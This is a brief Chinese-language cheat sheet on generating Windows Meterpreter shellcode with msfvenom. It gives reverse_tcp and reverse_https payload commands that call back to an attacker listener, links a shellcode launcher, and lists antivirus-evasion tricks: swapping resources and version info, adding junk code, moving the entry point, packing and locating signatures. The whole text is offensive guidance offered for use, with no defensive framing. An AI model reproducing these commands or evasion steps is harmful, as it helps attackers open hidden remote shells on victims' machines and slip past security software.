生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.241.132 lport=8080 -e
-p:指定payload;
-e:指定编码方式;
-i:编译次数;
-b:去除指定代码,一般都是空代码或者错误代码;
lhost:指定本机监听端口;
-f:指定生成格式;
-o:指定生成输出位置;
shellcode执行盒执行
https://github.com/clinicallyinane/shellcode_launcher
备注:不可以关闭窗口,否则session掉线!!
但是会通信会被拦截。
使用https shellcode
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.241.232 lport=443 -e
免杀常用方法
- 观察杀毒软件报的病毒名称,如果修改后文件能正常使用并且杀毒软件名称变了,这样一般可以过滤掉。
- 如果怎么换资源都没有用,加壳杀软也报同样名字的病毒,就去定位一下特征码。
- 不同的杀毒软件免杀的方法略有不同。
360报qvm7免杀方法是替代资源文件和版本信息
- 常用免杀方法:替换资源+加花+修改入口点+加壳。
关键词:小7免杀